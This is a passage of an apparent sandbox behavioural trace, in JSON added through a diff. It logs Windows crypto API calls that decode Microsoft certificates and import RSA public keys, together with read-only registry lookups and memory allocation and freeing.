"0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x03\\x01\\x01\\xff" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2987 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680cb0d", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "\\x03\\x02\\x01\\x86" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2988 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767fcffb", + "parentcaller": "0x767eb471", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x05\\xed0\\x82\\x03\\xd5\\xa0\\x03\\x02\\x01\\x02\\x02\\x10(\\xcc:%\\xbf\\xbaD\\xacD\\x9a\\x9bXkC9\\xaa0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x881\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1200\\x06\\x03U\\x04\\x03\\x13)Microsoft Root Certificate Authority 20100\\x1e\\x17\r100623215724Z\\x17\r350623220401Z0\\x81\\x881\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x10" + }, + { + "name": "Flags", + "value": "0x0000800d" + } + ], + "repeated": 0, + "id": 2989 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767fe94d", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x02\n\\x02\\x82\\x02\\x01\\x00\\xb9\\x08\\x9e(\\xe4\\xe4\\xec\\x06NPh\\xb3A\\xc5{\\xeb\\xae\\xb6\\x8e\\xaf\\x81\\xba\"D\\x1fe4iL\\xbep@\\x17\\xf2\\x16{\\xe2y\\xfd\\x86\\xed\r9\\xf4\\x1b\\xa8\\xad\\x92\\x90\\x1e\\xcb=v\\x8fZ\\xd9\\xb5\\x91\\x10.<\\x05\\x8d\\x8am$T\\xe7\\x1f\\xedV\\xad\\x83\\xb4P\\x9c\\x15\\xa5\\x17t\\x88Y \\xfc\\x08\\xc5\\x84v\\xd3h\\xd4o(x\\xce\\\\xb8\\xf3P\\x90D\\xff\\xe3c_\\xbe\\xa1\\x9a,\\x96\\x15\\x04\\xd6\\x07\\xfe\\x1e\\x84!\\xe0B1\\x11\\xc4(6\\x94\\xcfP\\xa4b\\x9e\\xc9\\xd6\\xabq\\x00\\xb2[\\x0c\\xe6\\x96\\xd4\n$\\x96\\xf5\\xff\\xc6\\xd5\\xb7\\x1b\\xd7\\xcb\\xb7!b\\xaf\\x12\\xdc\\xa1]7\\xe3\\x1a\\xfb\\x1aF\\x98\\xc0\\x9b\\xc0\\xe7c\\x1f*\\x08\\x93\\x02~\\x1ej\\x8e\\xf2\\x9f\\x18\\x89\\xe4\"\\x85\\xa2\\xb1\\x84W@\\xff\\xf5\\x0e\\xd8o\\x9c\\xed\\xe2E1\\x01\\xcd\\x17\\xe9\\x7f\\xb0\\x81E\\xe3\\xaa!@&\\xa1r\\xaa\\xa7O<\\x01\\x05~\\xee\\x83X\\xb1^\\x06c\\x99b\\x91x\\x82\\xb7\r\\x93\\x0c$j\\xb4\\x1b\\xdb" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2990 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767fde90", + "parentcaller": "0x767ff4ed", + "category": "crypto", + "api": "BCryptImportKeyPair", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyBlob", + "value": "RSA1\\x00\\x10\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xb9\\x08\\x9e(\\xe4\\xe4\\xec\\x06NPh\\xb3A\\xc5{\\xeb\\xae\\xb6\\x8e\\xaf\\x81\\xba\"D\\x1fe4iL\\xbep@\\x17\\xf2\\x16{\\xe2y\\xfd\\x86\\xed\r9\\xf4\\x1b\\xa8\\xad\\x92\\x90\\x1e\\xcb=v\\x8fZ\\xd9\\xb5\\x91\\x10.<\\x05\\x8d\\x8am$T\\xe7\\x1f\\xedV\\xad\\x83\\xb4P\\x9c\\x15\\xa5\\x17t\\x88Y \\xfc\\x08\\xc5\\x84v\\xd3h\\xd4o(x\\xce\\\\xb8\\xf3P\\x90D\\xff\\xe3c_\\xbe\\xa1\\x9a,\\x96\\x15\\x04\\xd6\\x07\\xfe\\x1e\\x84!\\xe0B1\\x11\\xc4(6\\x94\\xcfP\\xa4b\\x9e\\xc9\\xd6\\xabq\\x00\\xb2[\\x0c\\xe6\\x96\\xd4\n$\\x96\\xf5\\xff\\xc6\\xd5\\xb7\\x1b\\xd7\\xcb\\xb7!b\\xaf\\x12\\xdc\\xa1]7\\xe3\\x1a\\xfb\\x1aF\\x98\\xc0\\x9b\\xc0\\xe7c\\x1f*\\x08\\x93\\x02~\\x1ej\\x8e\\xf2\\x9f\\x18\\x89\\xe4\"\\x85\\xa2\\xb1\\x84W@\\xff\\xf5\\x0e\\xd8o\\x9c\\xed\\xe2E1\\x01\\xcd\\x17\\xe9\\x7f\\xb0\\x81E\\xe3\\xaa!@&\\xa1r\\xaa\\xa7O<\\x01\\x05~\\xee\\x83X" + }, + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "CryptKey", + "value": "0x00568c28" + }, + { + "name": "Length", + "value": "539" + } + ], + "repeated": 0, + "id": 2991 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701f645", + "parentcaller": "0x77037a44", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05856000" + }, + { + "name": "RegionSize", + "value": "0x00011000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2992 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680c85e", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2993 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767fcffb", + "parentcaller": "0x767eb9aa", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x07\r0\\x82\\x04\\xf5\\xa0\\x03\\x02\\x01\\x02\\x02\na\\x11l\\x92\\x00\\x00\\x00\\x00\\x00\\x070\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x881\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1200\\x06\\x03U\\x04\\x03\\x13)Microsoft Root Certificate Authority 20100\\x1e\\x17\r110329185839Z\\x17\r260329190839Z0\\x81\\x811\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04" + }, + { + "name": "Flags", + "value": "0x0000800d" + } + ], + "repeated": 0, + "id": 2994 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767fe94d", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x02\n\\x02\\x82\\x02\\x01\\x00\\xb9\\x08\\x9e(\\xe4\\xe4\\xec\\x06NPh\\xb3A\\xc5{\\xeb\\xae\\xb6\\x8e\\xaf\\x81\\xba\"D\\x1fe4iL\\xbep@\\x17\\xf2\\x16{\\xe2y\\xfd\\x86\\xed\r9\\xf4\\x1b\\xa8\\xad\\x92\\x90\\x1e\\xcb=v\\x8fZ\\xd9\\xb5\\x91\\x10.<\\x05\\x8d\\x8am$T\\xe7\\x1f\\xedV\\xad\\x83\\xb4P\\x9c\\x15\\xa5\\x17t\\x88Y \\xfc\\x08\\xc5\\x84v\\xd3h\\xd4o(x\\xce\\\\xb8\\xf3P\\x90D\\xff\\xe3c_\\xbe\\xa1\\x9a,\\x96\\x15\\x04\\xd6\\x07\\xfe\\x1e\\x84!\\xe0B1\\x11\\xc4(6\\x94\\xcfP\\xa4b\\x9e\\xc9\\xd6\\xabq\\x00\\xb2[\\x0c\\xe6\\x96\\xd4\n$\\x96\\xf5\\xff\\xc6\\xd5\\xb7\\x1b\\xd7\\xcb\\xb7!b\\xaf\\x12\\xdc\\xa1]7\\xe3\\x1a\\xfb\\x1aF\\x98\\xc0\\x9b\\xc0\\xe7c\\x1f*\\x08\\x93\\x02~\\x1ej\\x8e\\xf2\\x9f\\x18\\x89\\xe4\"\\x85\\xa2\\xb1\\x84W@\\xff\\xf5\\x0e\\xd8o\\x9c\\xed\\xe2E1\\x01\\xcd\\x17\\xe9\\x7f\\xb0\\x81E\\xe3\\xaa!@&\\xa1r\\xaa\\xa7O<\\x01\\x05~\\xee\\x83X\\xb1^\\x06c\\x99b\\x91x\\x82\\xb7\r\\x93\\x0c$j\\xb4\\x1b\\xdb" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2995 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767fde90", + "parentcaller": "0x767ff4ed", + "category": "crypto", + "api": "BCryptImportKeyPair", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyBlob", + "value": "RSA1\\x00\\x10\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xb9\\x08\\x9e(\\xe4\\xe4\\xec\\x06NPh\\xb3A\\xc5{\\xeb\\xae\\xb6\\x8e\\xaf\\x81\\xba\"D\\x1fe4iL\\xbep@\\x17\\xf2\\x16{\\xe2y\\xfd\\x86\\xed\r9\\xf4\\x1b\\xa8\\xad\\x92\\x90\\x1e\\xcb=v\\x8fZ\\xd9\\xb5\\x91\\x10.<\\x05\\x8d\\x8am$T\\xe7\\x1f\\xedV\\xad\\x83\\xb4P\\x9c\\x15\\xa5\\x17t\\x88Y \\xfc\\x08\\xc5\\x84v\\xd3h\\xd4o(x\\xce\\\\xb8\\xf3P\\x90D\\xff\\xe3c_\\xbe\\xa1\\x9a,\\x96\\x15\\x04\\xd6\\x07\\xfe\\x1e\\x84!\\xe0B1\\x11\\xc4(6\\x94\\xcfP\\xa4b\\x9e\\xc9\\xd6\\xabq\\x00\\xb2[\\x0c\\xe6\\x96\\xd4\n$\\x96\\xf5\\xff\\xc6\\xd5\\xb7\\x1b\\xd7\\xcb\\xb7!b\\xaf\\x12\\xdc\\xa1]7\\xe3\\x1a\\xfb\\x1aF\\x98\\xc0\\x9b\\xc0\\xe7c\\x1f*\\x08\\x93\\x02~\\x1ej\\x8e\\xf2\\x9f\\x18\\x89\\xe4\"\\x85\\xa2\\xb1\\x84W@\\xff\\xf5\\x0e\\xd8o\\x9c\\xed\\xe2E1\\x01\\xcd\\x17\\xe9\\x7f\\xb0\\x81E\\xe3\\xaa!@&\\xa1r\\xaa\\xa7O<\\x01\\x05~\\xee\\x83X" + }, + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "CryptKey", + "value": "0x00568c28" + }, + { + "name": "Length", + "value": "539" + } + ], + "repeated": 0, + "id": 2996 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680002f", + "parentcaller": "0x767f55e3", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x07\r0\\x82\\x04\\xf5\\xa0\\x03\\x02\\x01\\x02\\x02\na\\x11l\\x92\\x00\\x00\\x00\\x00\\x00\\x070\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x881\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1200\\x06\\x03U\\x04\\x03\\x13)Microsoft Root Certificate Authority 20100\\x1e\\x17\r110329185839Z\\x17\r260329190839Z0\\x81\\x811\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04" + }, + { + "name": "Flags", + "value": "0x0000800d" + } + ], + "repeated": 0, + "id": 2997 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767fcffb", + "parentcaller": "0x767eb9aa", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x06\\x140\\x82\\x03\\xfc\\xa0\\x03\\x02\\x01\\x02\\x02\\x133\\x00\\x00\\x00q9\\xee\\x0eJ\\x97o\nm\\x00\\x00\\x00\\x00\\x00q0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x811\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1+0)\\x06\\x03U\\x04\\x03\\x13\"Microsoft Certificate List CA 20110\\x1e\\x17\r240912201741Z\\x17\r250911201741Z0\\x81\\x891\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03" + }, + { + "name": "Flags", + "value": "0x0000800d" + } + ], + "repeated": 0, + "id": 2998 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767fe94d", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x02\n\\x02\\x82\\x02\\x01\\x00\\xb8\\x84z\\x80\\xfdM'\\xa7\\xd2\\xef\\x826\\xf1S\\x05\\x9d\\xbeBm\\x8e1\\x08G\\xcb\\xcd\\xb3\\x83\nKN3\\x1a.|\\xddr\\x81\\x8d\\xce\\x90\\xfc<\\x05\\xcb/4\\x858\\x8f<\\x1chm`QRM\\xac\\xdam+~\\xb3sG\\xab\\xd2\\xdc\\x95qJ1\\x81Z\\xa1\\x1f\\xab\\x82&E-\\x8c\\xe8\\x84x\\xbd \\xf0\r\\xc6\\xf5\\xae&\\x87\\x1eV\\x8eU<\\x0802\\x94\\x94\"\\x93\\x0b\\xa5\\xb0\\xc6]\\xe6-\\x819\\xcd\\xe9\\xc7\\xae\\xe8\\xd8IqI\\xab\\x91t\\xb8O\\x8d/G\\xb3?\\xd0\\x93\\x83\\\\x02\\x1a\\xdeK\\xb8\\xb2<7\\xe9\\x93\\xear[\\x98\\xc7\\xe3\\xac\\x18\\xe0\\xe6~J\\xc1\\x81,\\xfd\"\\x14vs\\xe1h\\xdc \t\\xc0\\xf3F\\xcd#&\\xc8E\"\\xca\\xc7\\xbct\\xfc\\x89\\xffW\\xe0\\xcf\\xbd\\x8e\\xb0+\\xef&\\xd6w\\xab\\x1a\\xf4gA\\xf1^\\x0cq\\xaa\\x02\\x7f^\\xc0\\x82\\xaa\t\\x8b\\xec\\x89\\x88A\\xf5\\x03Bi\\xd9\\x1fE\\xd9W>\\x04\\x96J\\xd52\\xb7\\xd1a&h\\xc7\\xc1\\xb1\\xa0\\xe0" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2999 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767fde90", + "parentcaller": "0x767ff4ed", + "category": "crypto", + "api": "BCryptImportKeyPair", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyBlob", + "value": "RSA1\\x00\\x10\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xb8\\x84z\\x80\\xfdM'\\xa7\\xd2\\xef\\x826\\xf1S\\x05\\x9d\\xbeBm\\x8e1\\x08G\\xcb\\xcd\\xb3\\x83\nKN3\\x1a.|\\xddr\\x81\\x8d\\xce\\x90\\xfc<\\x05\\xcb/4\\x858\\x8f<\\x1chm`QRM\\xac\\xdam+~\\xb3sG\\xab\\xd2\\xdc\\x95qJ1\\x81Z\\xa1\\x1f\\xab\\x82&E-\\x8c\\xe8\\x84x\\xbd \\xf0\r\\xc6\\xf5\\xae&\\x87\\x1eV\\x8eU<\\x0802\\x94\\x94\"\\x93\\x0b\\xa5\\xb0\\xc6]\\xe6-\\x819\\xcd\\xe9\\xc7\\xae\\xe8\\xd8IqI\\xab\\x91t\\xb8O\\x8d/G\\xb3?\\xd0\\x93\\x83\\\\x02\\x1a\\xdeK\\xb8\\xb2<7\\xe9\\x93\\xear[\\x98\\xc7\\xe3\\xac\\x18\\xe0\\xe6~J\\xc1\\x81,\\xfd\"\\x14vs\\xe1h\\xdc \t\\xc0\\xf3F\\xcd#&\\xc8E\"\\xca\\xc7\\xbct\\xfc\\x89\\xffW\\xe0\\xcf\\xbd\\x8e\\xb0+\\xef&\\xd6w\\xab\\x1a\\xf4gA\\xf1^\\x0cq\\xaa\\x02\\x7f^\\xc0\\x82\\xaa\t\\x8b\\xec\\x89\\x88A\\xf5\\x03Bi\\xd9\\x1fE" + }, + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "CryptKey", + "value": "0x00568908" + }, + { + "name": "Length", + "value": "539" + } + ], + "repeated": 0, + "id": 3000 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680002f", + "parentcaller": "0x767f55e3", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x06\\x140\\x82\\x03\\xfc\\xa0\\x03\\x02\\x01\\x02\\x02\\x133\\x00\\x00\\x00q9\\xee\\x0eJ\\x97o\nm\\x00\\x00\\x00\\x00\\x00q0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x811\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1+0)\\x06\\x03U\\x04\\x03\\x13\"Microsoft Certificate List CA 20110\\x1e\\x17\r240912201741Z\\x17\r250911201741Z0\\x81\\x891\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03" + }, + { + "name": "Flags", + "value": "0x0000800d" + } + ], + "repeated": 0, + "id": 3001 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ac98b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 3002 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Cryptography\\OID" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID" + } + ], + "repeated": 0, + "id": 3003 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 3004 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006b8" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 0" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0" + } + ], + "repeated": 0, + "id": 3005 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006d0" + }, + { + "name": "ObjectAttributesName", + "value": "CertDllVerifyCertificateChainPolicy" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllVerifyCertificateChainPolicy" + } + ], + "repeated": 0, + "id": 3006 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 3007 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006b8" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 1" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1" + } + ], + "repeated": 0, + "id": 3008 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006d0" + }, + { + "name": "ObjectAttributesName", + "value": "CertDllVerifyCertificateChainPolicy" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CertDllVerifyCertificateChainPolicy" + } + ], + "repeated": 0, + "id": 3009 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": false, + "return": "0xffffffff8000001a", + "pretty_return": "NO_MORE_ENTRIES", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 3010 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680b434", + "parentcaller": "0x7680b50c", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\t" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 3011 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680b434", + "parentcaller": "0x7680b50c", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0.\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x01\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\t\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x13" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 3012 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05a91000" + }, + { + "name": "RegionSize", + "value": "0x0002d000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 3013 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05927000" + }, + { + "name": "RegionSize", + "value": "0x0001f000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 3014 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05856000" + }, + { + "name": "RegionSize", + "value": "0x00011000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 3015 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + 